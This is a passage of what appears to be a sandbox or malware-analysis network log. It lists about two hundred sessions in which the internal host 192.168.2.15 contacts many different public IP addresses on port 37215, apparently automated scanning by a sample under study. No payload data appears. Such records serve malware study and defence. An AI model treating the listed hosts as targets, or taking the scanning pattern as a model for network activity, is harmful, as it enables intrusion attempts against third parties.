                                              16646192.168.2.1546878181.185.196.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16647192.168.2.155416894.62.223.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16648192.168.2.1556784102.190.177.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16649192.168.2.1543706197.172.231.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16650192.168.2.1555866122.198.86.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16651192.168.2.1543646157.175.0.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16652192.168.2.155977837.65.252.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16653192.168.2.1541664186.205.152.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16654192.168.2.1535740122.83.237.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16655192.168.2.155548063.165.171.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16656192.168.2.1554466190.9.208.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16657192.168.2.1546124190.15.108.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16658192.168.2.1554408197.204.201.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16659192.168.2.1546748181.40.232.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16660192.168.2.1547210102.106.190.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16661192.168.2.1551164102.12.204.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16662192.168.2.154166845.153.255.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16663192.168.2.155056231.24.130.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16664192.168.2.155283241.29.153.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16665192.168.2.1550342122.177.47.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16666192.168.2.1553258190.70.28.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16667192.168.2.153304441.227.134.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16668192.168.2.1549160197.103.29.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16669192.168.2.1555656138.10.216.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16670192.168.2.155589637.197.166.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16671192.168.2.155101445.90.174.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16672192.168.2.155770037.168.253.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16673192.168.2.154475641.113.159.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16674192.168.2.1547794197.171.47.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16675192.168.2.1548680181.115.59.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16676192.168.2.1560004197.13.35.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16677192.168.2.1543866222.187.23.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16678192.168.2.1540184138.57.73.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16679192.168.2.156092657.5.155.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16680192.168.2.1546122222.171.194.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16681192.168.2.1550996190.61.188.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16682192.168.2.1549788163.61.43.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16683192.168.2.1549880157.175.202.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16684192.168.2.153849449.128.236.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16685192.168.2.154607837.101.111.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16686192.168.2.1544286190.14.171.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16687192.168.2.153955237.154.156.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16688192.168.2.154167294.145.204.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16689192.168.2.1554852197.148.142.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16690192.168.2.1557528157.8.255.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16691192.168.2.154830837.211.31.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16692192.168.2.1542138102.46.213.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16693192.168.2.1550570121.174.220.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16694192.168.2.1533092222.47.159.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16695192.168.2.1549856138.94.223.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16696192.168.2.1559376121.92.201.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16697192.168.2.1549780186.140.115.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16698192.168.2.1540480186.217.109.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16699192.168.2.156037831.148.193.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16700192.168.2.154837631.174.214.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16701192.168.2.1538428102.157.107.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16702192.168.2.1551248122.190.76.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16703192.168.2.155340894.24.181.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16704192.168.2.1543156156.165.157.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16705192.168.2.153766037.133.219.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16706192.168.2.153797431.157.93.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16707192.168.2.1548900122.244.50.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16708192.168.2.1545686157.109.16.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16709192.168.2.1543682157.170.49.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16710192.168.2.154102231.144.233.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16711192.168.2.153556841.14.124.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16712192.168.2.155608237.173.93.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16713192.168.2.1554998190.5.120.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16714192.168.2.153936037.84.139.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16715192.168.2.155753441.102.93.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16716192.168.2.1539882102.179.122.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16717192.168.2.1548184186.83.200.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16718192.168.2.1547470102.239.46.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16719192.168.2.1538584138.160.185.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16720192.168.2.155308245.109.89.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16721192.168.2.1551574181.127.94.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16722192.168.2.1559114156.53.176.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16723192.168.2.1538318154.96.6.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16724192.168.2.1553492197.252.92.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16725192.168.2.154088241.157.156.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16726192.168.2.1555878122.46.167.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16727192.168.2.1540334186.196.57.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16728192.168.2.1553030157.96.242.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16729192.168.2.1553994190.10.42.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16730192.168.2.155870437.212.101.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16731192.168.2.153692441.173.204.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16732192.168.2.1550962181.239.192.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16733192.168.2.1548922197.43.253.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16734192.168.2.1538256159.155.195.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16735192.168.2.1540696138.153.38.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16736192.168.2.155313031.214.40.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16737192.168.2.1542246222.144.196.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16738192.168.2.1553276122.223.36.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16739192.168.2.155984041.103.168.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16740192.168.2.1558580122.45.123.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16741192.168.2.154403494.76.1.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16742192.168.2.153791241.28.54.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16743192.168.2.1555642190.136.204.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16744192.168.2.153771445.195.44.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16745192.168.2.155301645.160.76.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16746192.168.2.1536568197.31.196.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16747192.168.2.1533476122.62.136.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16748192.168.2.155494094.104.155.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16749192.168.2.155322845.215.213.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16750192.168.2.155557431.27.205.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16751192.168.2.154966231.218.139.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16752192.168.2.1540318122.246.86.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16753192.168.2.1558698157.33.52.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16754192.168.2.154322841.47.61.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16755192.168.2.153694294.107.241.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16756192.168.2.1542512181.11.102.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16757192.168.2.154338037.224.103.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16758192.168.2.153813645.159.162.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16759192.168.2.1536110138.147.248.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16760192.168.2.1535884157.20.227.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16761192.168.2.1534234186.211.247.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16762192.168.2.154870294.99.80.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16763192.168.2.1559484190.7.114.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16764192.168.2.1536764121.203.225.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16765192.168.2.155480645.69.197.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16766192.168.2.1541938190.127.232.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16767192.168.2.1534744121.242.114.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16768192.168.2.154531694.26.205.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16769192.168.2.1557370121.79.76.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16770192.168.2.1553524197.26.255.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16771192.168.2.1546950222.134.203.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16772192.168.2.1533420157.206.97.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16773192.168.2.1551330197.238.99.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16774192.168.2.1558716120.67.245.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16775192.168.2.1556232186.223.38.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16776192.168.2.1543628102.173.124.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16777192.168.2.154501831.103.115.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16778192.168.2.155867245.32.163.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16779192.168.2.1543620156.175.76.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16780192.168.2.1547140190.101.60.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16781192.168.2.155473294.16.107.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16782192.168.2.1535876138.118.85.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16783192.168.2.1543154102.127.244.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16784192.168.2.153723231.160.81.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16785192.168.2.1554140222.95.163.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16786192.168.2.1559966122.49.145.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16787192.168.2.1558530190.51.255.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16788192.168.2.1542238190.46.62.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16789192.168.2.155448431.252.116.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16790192.168.2.1552446190.224.219.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16791192.168.2.153600294.179.180.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16792192.168.2.1533626186.55.99.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16793192.168.2.1547888121.94.61.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16794192.168.2.1533054112.100.139.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16795192.168.2.154063631.71.94.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16796192.168.2.155909031.117.86.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16797192.168.2.1533280157.40.166.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16798192.168.2.1534514190.88.202.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16799192.168.2.1543900186.165.99.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16800192.168.2.1535894156.42.46.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16801192.168.2.1546696122.156.91.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16802192.168.2.1537926190.167.199.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16803192.168.2.1545252197.34.63.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16804192.168.2.1552812197.131.135.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16805192.168.2.1557470147.54.169.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16806192.168.2.154305845.252.160.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16807192.168.2.1544018102.72.194.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16808192.168.2.1555752156.9.219.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16809192.168.2.154238231.185.2.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16810192.168.2.1548206102.64.175.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16811192.168.2.1557764102.116.11.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16812192.168.2.153403231.44.55.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16813192.168.2.1545188186.176.90.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16814192.168.2.1546406222.81.8.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16815192.168.2.1540952156.244.76.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16816192.168.2.1553184102.16.66.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16817192.168.2.154813837.93.5.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16818192.168.2.154714437.64.105.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16819192.168.2.153742241.13.158.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16820192.168.2.155986041.11.51.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16821192.168.2.155336437.81.234.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16822192.168.2.1557398197.164.49.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16823192.168.2.1538218138.55.161.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16824192.168.2.1552904157.99.109.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16825192.168.2.155970431.135.203.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16826192.168.2.1548654102.47.87.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16827192.168.2.1542828197.226.191.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16828192.168.2.154724831.98.214.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16829192.168.2.1537068102.39.83.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16830192.168.2.1539584157.89.228.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16831192.168.2.154140480.76.137.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16832192.168.2.155274841.125.51.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16833192.168.2.1540156181.253.160.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16834192.168.2.1558264157.2.57.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16835192.168.2.1536470121.52.248.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16836192.168.2.1556510138.173.168.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16837192.168.2.154296831.35.235.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16838192.168.2.1550268186.201.18.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16839192.168.2.156033894.111.151.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16840192.168.2.154060637.25.30.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16841192.168.2.1558672222.188.252.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16842192.168.2.155859031.88.44.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16843192.168.2.154010431.140.104.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16844192.168.2.1543828190.120.139.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16845192.168.2.1560186181.40.30.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16846192.168.2.156084245.234.103.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16847192.168.2.1548294181.28.179.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16848192.168.2.1535652197.171.134.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16849192.168.2.1534064138.158.107.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16850192.168.2.155414441.66.79.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16851192.168.2.1550158121.47.38.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16852192.168.2.154377841.124.1.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16853192.168.2.153610841.24.188.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16854192.168.2.1547982138.187.208.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16855192.168.2.1547546121.250.213.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16856192.168.2.1549782102.22.201.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16857192.168.2.1542062181.133.57.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16858192.168.2.1553100181.74.131.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16859192.168.2.1546862186.213.112.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16860192.168.2.1551814186.77.154.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16861192.168.2.1541948186.226.105.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16862192.168.2.1536036102.21.114.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16863192.168.2.154603241.190.247.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16864192.168.2.1539328157.168.93.12937215
                                              TimestampBytes transferredDirectionData


